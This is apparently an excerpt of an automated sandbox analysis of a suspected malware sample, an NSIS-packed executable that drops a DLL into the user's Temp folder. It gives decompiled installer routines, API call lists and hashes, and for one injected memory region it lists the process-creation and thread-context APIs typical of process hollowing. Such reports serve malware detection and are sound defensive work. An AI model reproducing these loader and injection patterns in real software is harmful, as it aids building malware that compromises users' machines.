                                                                          0x004017fa
                                                                          0x004017fc
                                                                          0x00401801
                                                                          0x00401801
                                                                          0x0040180c
                                                                          0x0040180c
                                                                          0x0040181d
                                                                          0x0040181f
                                                                          0x0040181f
                                                                          0x00401820
                                                                          0x00401820
                                                                          0x00401823
                                                                          0x00401826
                                                                          0x00401829
                                                                          0x0040182f
                                                                          0x0040182f
                                                                          0x00401833
                                                                          0x00401833
                                                                          0x0040183b
                                                                          0x0040184a
                                                                          0x0040184f
                                                                          0x00401852
                                                                          0x00401855
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401857
                                                                          0x0040185a
                                                                          0x004018b4
                                                                          0x004018b9
                                                                          0x004015ca
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x0040292f
                                                                          0x00402932
                                                                          0x00402932
                                                                          0x00000000
                                                                          0x0040185c
                                                                          0x00401862
                                                                          0x0040186d
                                                                          0x0040187a
                                                                          0x00401885
                                                                          0x0040189b
                                                                          0x0040189b
                                                                          0x0040189e
                                                                          0x00000000
                                                                          0x004018a4
                                                                          0x004018a4
                                                                          0x004018a5
                                                                          0x004018c2
                                                                          0x00402938
                                                                          0x00402938
                                                                          0x00402938
                                                                          0x004018a7
                                                                          0x004018a7
                                                                          0x004018a8
                                                                          0x00401495
                                                                          0x00402293
                                                                          0x00402293
                                                                          0x00402293
                                                                          0x004018a5
                                                                          0x0040189e
                                                                          0x0040293a
                                                                          0x0040293e
                                                                          0x0040293e
                                                                          0x004018d2
                                                                          0x004018d7
                                                                          0x004018dd
                                                                          0x004018de
                                                                          0x004018df
                                                                          0x004018e2
                                                                          0x004018e5
                                                                          0x004018ea
                                                                          0x004018f0
                                                                          0x004018f4
                                                                          0x004018f6
                                                                          0x004018fe
                                                                          0x0040190a
                                                                          0x004018f8
                                                                          0x004018f8
                                                                          0x004018fc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004018fc
                                                                          0x00401913
                                                                          0x00401919
                                                                          0x0040191b
                                                                          0x00000000
                                                                          0x00401921
                                                                          0x00401921
                                                                          0x00401924
                                                                          0x0040193c
                                                                          0x00401926
                                                                          0x00401929
                                                                          0x00401932
                                                                          0x00401932
                                                                          0x00401941
                                                                          0x00401946
                                                                          0x0040228e
                                                                          0x00000000
                                                                          0x0040228e
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                          • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                          • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll$Ivlfdpdlcleoxmzl
                                                                          • API String ID: 1152937526-2893049330
                                                                          • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                          • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                          • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                          • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78ed38
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78ed38
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}



























                                                                          0x00402ec5
                                                                          0x00402ec9
                                                                          0x00402ed0
                                                                          0x00402ed3
                                                                          0x00402ed5
                                                                          0x00402ed5
                                                                          0x00402ede
                                                                          0x00402ee1
                                                                          0x00402ee4
                                                                          0x00402ee6
                                                                          0x00402ee6
                                                                          0x00402eed
                                                                          0x00402ef2
                                                                          0x00402efd
                                                                          0x00402efd
                                                                          0x00402f08
                                                                          0x00402f0f
                                                                          0x004030bb
                                                                          0x004030bb
                                                                          0x00000000
                                                                          0x00402f15
                                                                          0x00402f19
                                                                          0x0040305e
                                                                          0x004030ab
                                                                          0x004030ad
                                                                          0x004030ad
                                                                          0x004030b9
                                                                          0x004030c0
                                                                          0x004030c3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004030b9
                                                                          0x00403063
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040306a
                                                                          0x0040306a
                                                                          0x00403070
                                                                          0x00403072
                                                                          0x00403072
                                                                          0x0040307e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040308b
                                                                          0x00403093
                                                                          0x00403058
                                                                          0x00403058
                                                                          0x004030bd
                                                                          0x004030bd
                                                                          0x00000000
                                                                          0x0040309a
                                                                          0x0040309a
                                                                          0x0040309d
                                                                          0x004030a4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004030a6
                                                                          0x00403093
                                                                          0x00000000
                                                                          0x0040306a
                                                                          0x00402f1f
                                                                          0x00402f25
                                                                          0x00402f25
                                                                          0x00402f2c
                                                                          0x00402f32
                                                                          0x00402f39
                                                                          0x00402f3f
                                                                          0x00402f42
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402f4d
                                                                          0x00402f4d
                                                                          0x00402f4d
                                                                          0x00402f55
                                                                          0x00402f57
                                                                          0x00402f57
                                                                          0x00402f63
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402f69
                                                                          0x00402f6c
                                                                          0x00402f72
                                                                          0x00402f78
                                                                          0x00402f78
                                                                          0x00402f83
                                                                          0x00402f89
                                                                          0x00402f8e
                                                                          0x00402f95
                                                                          0x00402f98
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402f9e
                                                                          0x00402fa4
                                                                          0x00402fa6
                                                                          0x00402fb3
                                                                          0x00402fb5
                                                                          0x00402fe3
                                                                          0x00402fe9
                                                                          0x00402ff2
                                                                          0x00402ff7
                                                                          0x00402ff7
                                                                          0x00402ffe
                                                                          0x0040304c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403000
                                                                          0x00403003
                                                                          0x00403025
                                                                          0x00403028
                                                                          0x0040302b
                                                                          0x00403034
                                                                          0x00403037
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040303d
                                                                          0x00403041
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403047
                                                                          0x00403011
                                                                          0x00403019
                                                                          0x00000000
                                                                          0x00403020
                                                                          0x00403020
                                                                          0x00000000
                                                                          0x00403020
                                                                          0x00403019
                                                                          0x00402ffe
                                                                          0x00403054
                                                                          0x00000000
                                                                          0x00403054
                                                                          0x00000000
                                                                          0x00402f4d

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402F1F
                                                                          • GetTickCount.KERNEL32 ref: 00402FA6
                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                          • wsprintfA.USER32 ref: 00402FE3
                                                                          • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CountTick$FileWritewsprintf
                                                                          • String ID: ... %d%%$8x
                                                                          • API String ID: 4209647438-795837185
                                                                          • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                          • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                          • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                          • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 026711AF, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 359memoryfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 026714FF
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0267155E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: AllocCreateFileVirtual
                                                                          • String ID: e6930c0fc78a4144acb5b27197cf04bb
                                                                          • API String ID: 1475775534-3037024217
                                                                          • Opcode ID: 275eac65df612a1e6b73968f0bc1e47eb40d7aa27af893a17d1ac999ba8f4b68
                                                                          • Instruction ID: 6014604044e98ce02e883d6186938342e6356cc8dc5c54e5335178733328fa5e
                                                                          • Opcode Fuzzy Hash: 275eac65df612a1e6b73968f0bc1e47eb40d7aa27af893a17d1ac999ba8f4b68
                                                                          • Instruction Fuzzy Hash: D8E14C35D54388EEEB21CBE4EC15BEDBBB5AF05710F10408AE608FA1D1D7B50A84DB29
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 026706DD, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 026707DF
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 026709AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: 8422cf8cb77b0d143726b15500871e2212305ee572a63309b2dee486b40caa12
                                                                          • Instruction ID: b7a23b6ffe122119ff564a26d839a7154b6945673a6a53905b8a7b3c16b1efae
                                                                          • Opcode Fuzzy Hash: 8422cf8cb77b0d143726b15500871e2212305ee572a63309b2dee486b40caa12
                                                                          • Instruction Fuzzy Hash: DBA10174E00209EFEF10DFE4E985BADBBB1BF08315F20849AE515BA2A0D3755A51DF24
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 84%
                                                                          			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                          0x004015d5
                                                                          0x004015dc
                                                                          0x004015e6
                                                                          0x004015e8
                                                                          0x004015ee
                                                                          0x004015f6
                                                                          0x004015fc
                                                                          0x004015fe
                                                                          0x00401601
                                                                          0x00401609
                                                                          0x00401616
                                                                          0x00401623
                                                                          0x00401623
                                                                          0x00401618
                                                                          0x00401619
                                                                          0x00401621
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401621
                                                                          0x00401616
                                                                          0x00401626
                                                                          0x00401629
                                                                          0x0040162b
                                                                          0x0040162c
                                                                          0x004015ee
                                                                          0x00401633
                                                                          0x00401653
                                                                          0x004021e8
                                                                          0x00401635
                                                                          0x00401637
                                                                          0x00401642
                                                                          0x00401648
                                                                          0x00401648
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                            • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040556D
                                                                            • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                            • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 3751793516-501415292
                                                                          • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                          • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                          • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                          • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                          0x004056c3
                                                                          0x004056c9
                                                                          0x004056ca
                                                                          0x004056ca
                                                                          0x004056cb
                                                                          0x004056d2
                                                                          0x004056dc
                                                                          0x004056e9
                                                                          0x004056ec
                                                                          0x004056f4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004056f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004056fa
                                                                          0x00000000
                                                                          0x004056fa
                                                                          0x00000000

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 004056D2
                                                                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                          • nsa, xrefs: 004056CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                          • API String ID: 1716503409-1609819632
                                                                          • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                          • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                          • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                          • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02670034, Relevance: 6.5, APIs: 4, Instructions: 540processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 0267034B
                                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 0267036E
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02670392
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThread
                                                                          • String ID:
                                                                          • API String ID: 2411489757-0
                                                                          • Opcode ID: 66e73b3f3eb02583a27478a9a57178bcb0c997f264448aff56fcfcd7a0c06261
                                                                          • Instruction ID: fb02b46711ff183f4780a9f649e86a3e9379db37b657fa95d460dbfc681da2bf
                                                                          • Opcode Fuzzy Hash: 66e73b3f3eb02583a27478a9a57178bcb0c997f264448aff56fcfcd7a0c06261
                                                                          • Instruction Fuzzy Hash: ED221731D50218EFEB24CFA4ED55BADB7B5BF48704F20409AE608FA2A0D7705A85DF25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












                                                                          0x0040136e
                                                                          0x004013fb
                                                                          0x00401382
                                                                          0x00401384
                                                                          0x00401387
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401389
                                                                          0x0040138a
                                                                          0x0040138f
                                                                          0x00401394
                                                                          0x00000000
                                                                          0x00401409
                                                                          0x00401396
